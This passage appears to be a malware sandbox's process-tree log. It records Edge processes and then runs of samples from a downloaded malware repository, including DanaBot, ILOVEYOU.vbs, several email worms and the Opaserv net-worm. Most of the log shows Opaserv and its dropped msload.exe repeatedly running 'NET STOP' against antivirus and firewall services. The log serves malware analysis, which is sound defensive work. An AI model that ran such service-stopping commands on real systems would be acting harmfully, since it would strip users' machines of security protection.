  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:1280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2596 /prefetch:8
  2⤵
  PID:4308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  PID:4144
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:2784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:2416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
  2⤵
  PID:4708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6772 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:6228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,3684855892698150859,772191826187150664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
  2⤵
  PID:6852

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2864

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4612

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3604

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
PID:3080
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3080 -s 296
  2⤵
  - Program crash
  PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3080 -ip 3080
1⤵
PID:5024

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Trood.a.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Trood.a.exe"
1⤵
PID:2752

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Prolin.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Prolin.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2892

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Quamo.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Quamo.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\ILOVEYOU.vbs"
1⤵
PID:484

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"
1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
- C:\Windows\SysWOW64\NET.exe
  NET STOP NAVAPSVC
  2⤵
  PID:4652
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 STOP NAVAPSVC
    3⤵
    PID:1772
- C:\Windows\SysWOW64\NET.exe
  NET STOP PERSFW
  2⤵
  PID:3680
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 STOP PERSFW
    3⤵
    PID:3400
- C:\Windows\SysWOW64\NET.exe
  NET STOP AVPCC
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 STOP AVPCC
    3⤵
    PID:3496
- C:\Windows\SysWOW64\NET.exe
  NET STOP MCSHIELD
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 STOP MCSHIELD
    3⤵
    PID:4952
- C:\Windows\SysWOW64\NET.exe
  NET STOP SWEEPSRV.SYS
  2⤵
  PID:4132
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 STOP SWEEPSRV.SYS
    3⤵
    PID:2676
- C:\WINDOWS\system\msload.exe
  C:\WINDOWS\system\msload.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1188
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4796
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      System Location Discovery: System Language Discovery
      PID:492
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3820
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:912
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:2512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:4348
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:4268
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:3852
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:1296
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:2188
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:3580
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:3496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:4792
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:3084
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:4920
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:4572
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:3248
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:740
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:1460
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2708
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:3612
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:2104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:3808
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      System Location Discovery: System Language Discovery
      PID:1812
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:4572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:4256
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:4792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:4152
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2676
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      System Location Discovery: System Language Discovery
      PID:3820
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:1204
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:1132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:2436
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:3748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:4148
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:3348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:4620
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:2200
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      System Location Discovery: System Language Discovery
      PID:2228
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:4032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:3580
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:1408
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:4528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:2188
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:2512
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:3464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:472
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:2060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:4020
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:2256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:4540
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:4528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:1040
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:4256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:2024
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:1916
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:1500
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:2972
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:3464
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:940
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:2032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:912
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:3544
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:4112
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:1204
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      System Location Discovery: System Language Discovery
      PID:4764
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:6584
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:7008
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:6996
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:6624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      System Location Discovery: System Language Discovery
      PID:6884
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:6636
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      System Location Discovery: System Language Discovery
      PID:6956
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:6648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:7020
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:2496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5300
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:1556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:5624
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:2036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5468
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    - System Location Discovery: System Language Discovery
    PID:124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      System Location Discovery: System Language Discovery
      PID:5648
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:2060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:5600
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5188
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5244
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:5272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:5104
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:5236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:4972
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5212
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:5424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:2256
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      System Location Discovery: System Language Discovery
      PID:6288
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6044
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:6168
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:6136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:6228
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:5364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      System Location Discovery: System Language Discovery
      PID:6008
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      PID:6372
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:2708
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      PID:5516
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:5648
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:2036
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:4932
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5384
- - C:\Windows\SysWOW64\NET.exe
    NET STOP SWEEPSRV.SYS
    3⤵
    PID:3748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
      4⤵
      System Location Discovery: System Language Discovery
      PID:5612
- - C:\Windows\SysWOW64\NET.exe
    NET STOP NAVAPSVC
    3⤵
    PID:6780
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP NAVAPSVC
      4⤵
      System Location Discovery: System Language Discovery
      PID:3060
- - C:\Windows\SysWOW64\NET.exe
    NET STOP PERSFW
    3⤵
    PID:6968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP PERSFW
      4⤵
      PID:1476
- - C:\Windows\SysWOW64\NET.exe
    NET STOP AVPCC
    3⤵
    PID:6676
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AVPCC
      4⤵
      PID:5408
- - C:\Windows\SysWOW64\NET.exe
    NET STOP MCSHIELD
    3⤵
    PID:6744
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP MCSHIELD
      4⤵
      PID:5144
- - C:\Windows\SysWOW64\NET.exe
